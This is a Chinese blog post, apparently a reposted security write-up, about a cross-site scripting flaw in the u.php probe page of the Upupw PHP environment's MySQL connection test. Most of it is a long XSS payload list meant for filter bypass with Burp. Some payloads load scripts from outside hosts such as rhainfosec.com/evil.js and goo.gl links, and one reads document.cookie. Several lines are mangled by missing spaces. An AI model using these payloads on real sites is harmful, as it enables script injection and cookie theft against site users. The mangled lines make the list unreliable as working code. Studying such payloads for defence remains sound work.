Upupw集成环境的一处通用漏洞

华盟学院山东省第二期线下学习计划

在Upupw的安装完毕后通常会生成一个u.php的文件,这个文件如下图,可以帮助我们了解当前环境。而问题则就出现在下面的mysql测试连通性。

Upupw集成环境的一处通用漏洞

在下面这里连接中随便输入密码,或者不输入都可以。

Upupw集成环境的一处通用漏洞

虽然有一个xss的防护机制。不过payload配合Burp。

Upupw集成环境的一处通用漏洞

<script>prompt(1);</script>
<script>confirm(1);</script>
<scriptsrc="http://rhainfosec.com/evil.js">
<scRiPt>alert(1);</scrIPt>
<scr<script>ipt>alert(1)</scr<script>ipt>
<a href="http://www.google.com">Clickme</a>
<a href="javascript:alert(1)">Clickme</a>
<a href="rhainfosec.com"onmouseover=alert(1)>ClickHere</a>
<a href="rhainfosec.com"onclimbatree=alert(1)>ClickHere</a>
<body/onhashchange=alert(1)><a href=#>clickit
<img src=x onerror=prompt(1);>
<img/src=aaa.jpg onerror=prompt(1);>
<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>
<iframe src="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<embed/src=//goo.gl/nlX0P>
<form action="Javascript:alert(1)"><inputtype=submit>
<isindex action="javascript:alert(1)"type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)type=image>
<isindex action=data:text/html,type=image>
<formaction="data:text&sol;html,<script>alert(1)&lt/script&gt"><button>CLICK
<isindexformaction="javascript:alert(1)"type=image>
<inputtype="image"formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<table background=javascript:alert(1)></table>
<video poster=javascript:alert(1)//></video>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?
<applet code="javascript:confirm(document.cookie);">
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"allowscriptaccess=always>
<svg/onload=prompt(1);><marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><sourceonerror="javascript:alert(1)">
<q/oncut=open()>
<q/oncut=alert(1)>
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<bodylanguage=vbsonload=alert-1
<commandonmouseover="x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6Fx6Ex3Bx63x6Fx6Ex6 6x69x72x6Dx26x6Cx70x61x72x3Bx31x26x72x70x61x72x3B">Save</command>
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw"=alertx281x29";>
<img style="xss:expression(alert(0))">
<div style="color:rgb(""&#0;x:expression(alert(1))"></div>
<style>#test{x:expression(alert(/XSS/))}</style>
<a onmouseover=location="javascript:alert(1)">click
<body onfocus="loaction="javascript:alert(1)"">123
<meta http-equiv="refresh"content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh"content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:u0061lert(1);"></g></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink">
<a><circle r=100 /><animate attributeName="xlink:href"values=";javascript:alert(1)"begin="0s"dur="0.1s"fill="freeze"/><svg>
<![CDATA[><imagexlink:href="]]>
<img/src=xx:xonerror=alert(2)//"></svg>
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)"http-equiv="refresh"/><math>
<a xlink:href="//jsfiddle.net/t846h/">click<svg><script>alert&#40/1/&#41</script>
<svg>
<script>alert&#40

Upupw集成环境的一处通用漏洞

Fuzz好几十个出来。哈哈

文章来源:黑家小无常

www.idc126.com

本文由 华盟网 作者: 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
1

发表评论